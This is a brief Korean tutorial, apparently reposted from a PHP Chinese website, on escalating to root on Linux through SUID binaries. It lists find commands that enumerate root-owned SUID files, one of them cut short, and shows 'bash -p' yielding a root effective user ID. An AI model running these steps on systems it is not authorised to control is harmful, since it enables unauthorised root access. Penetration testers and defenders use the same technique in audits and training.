Linux에서 SUID를 사용하여 권한을 확대하는 방법

SUID는 Linux의 권한 메커니즘입니다. 이 권한이 있는 파일이 실행되면 호출자는 일시적으로 파일 소유자의 권한을 얻습니다. SUID 권한이 있는 경우 시스템의 바이너리 및 도구를 사용하여 루트 권한 상승을 수행할 수 있습니다.

다음 명령은 시스템에서 실행 중인 모든 SUID 실행 파일을 검색할 수 있습니다. 특히 이 명령은 루트 권한이 있는 SUID가 있는 파일을 찾으려고 시도합니다.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls

위의 모든 바이너리는 해당 권한에 "s"가 포함되어 있고 루트 권한에 해당하므로 루트 사용자 권한으로 실행됩니다.

Bash

다음 명령은 루트 권한으로 bash 쉘을 엽니다.

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

위 내용은 Linux에서 SUID를 사용하여 권한을 확대하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!